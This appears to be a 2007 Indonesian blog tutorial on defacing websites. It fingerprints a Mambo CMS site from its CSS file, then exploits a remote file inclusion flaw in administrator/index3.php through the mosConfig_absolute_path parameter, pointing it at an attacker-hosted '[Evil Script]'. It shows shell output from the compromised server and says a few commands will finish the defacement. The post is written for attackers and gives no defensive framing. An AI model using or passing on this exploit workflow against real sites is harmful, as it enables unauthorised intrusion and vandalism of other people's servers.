Thursday, February 22, 2007

Web Hacking Deface

ok, pada saat mendeface web sang attacker haruslah ngengetahui terlebih dahulu dari system web tersebut, misalkan web tersebut dibangun dengan memakai source A,atau package B atau laen - lain,lalu bagai manakah saya bisa memperoleh informasi tersebut?, sangat banyak cara dan variasi yang dapat anda gunakan untuk mendapatkan informasi tentang web server target, misal seperti meliat file robots.txt, meliat sourcecode *.css, url, atau laen laen,...

Ok Untuk contoh victim saya sudah mendapatkan sc dari file css sebagai berikut:

/**
* @version $Id: install.css,v 1.2 2005/11/12 06:06:51 cauld Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
body {
margin: 0px;
padding: 0px;
color : #333;
background-color : #FFF;
font-size : 11px;
font-family : Arial, Helvetica, sans-serif;
}
.
.
.
. bla-bla-bla,....

ping-pong,... kita sudah dapat meliat dari web tersebut dibangun memakai mambo php vendor:http://mamboforge.net/projects/mambo untuk tahap selanjutnya download source code tersebut, teliti source, dan cari bug nya,ok misal aja dalam sc administrator kita dah dapat bug nya:

/**
* @version $Id: index3.php,v 1.4 2005/11/21 11:57:50 csouza Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
/** Set flag that this is a parent file */
define( "_VALID_MOS", 1 );if (!file_exists( "../configuration.php" )) {
header( "Location: ../installation/index.php" );
exit();
}require_once( "../globals.php" );
require_once( "../configuration.php" );
require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
include_once( $mosConfig_absolute_path . "/language/".$mosConfig_lang.".php" );
require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" );

huehuehuehue,.. url input tanpa filter require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" ); jadi?, ya gt dech,.... langsung aja luncurkan roket kita, jadi nya gini :

http://victim/administrator/index3.php?mosConfig_absolute_path=[Evil Script]

hehehehe,... mosConfig_absolute_path adalah nama variable dari absolute part
lalu liat apakah id yang punya web sama dengan si user(kamu sendiri)

cmd:$id;ls -lia
uid=501(victim) gid=501(victim) groups=501(victim)
total 32
267965 drwxr-xr-x 3 victim victim 4096 Des 31 23:13 .
245761 drwxr-xr-x 4 root root 4096 Des 31 23:13 ..
267968 -rw-r--r-- 1 victim victim 24 Des 31 23:13 index.php
267969 -rw-r--r-- 1 victim victim 191 Des 31 23:13 index2.php
267970 -rw-r--r-- 1 victim victim 191 Des 31 23:13 login.php
267971 -rw-r--r-- 1 victim victim 124 Des 31 23:13 index3.php
267972 drwxr-xr-x 1 victim victim 141 Des 31 23:13 backups
267973 -rw-r--r-- 1 victim victim 3722 Des 31 23:13 components
267974 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 images
267975 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 includes

nah keberuntungan di tangan mu,...dan hanya dengan beberapa command web akan terdeface
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)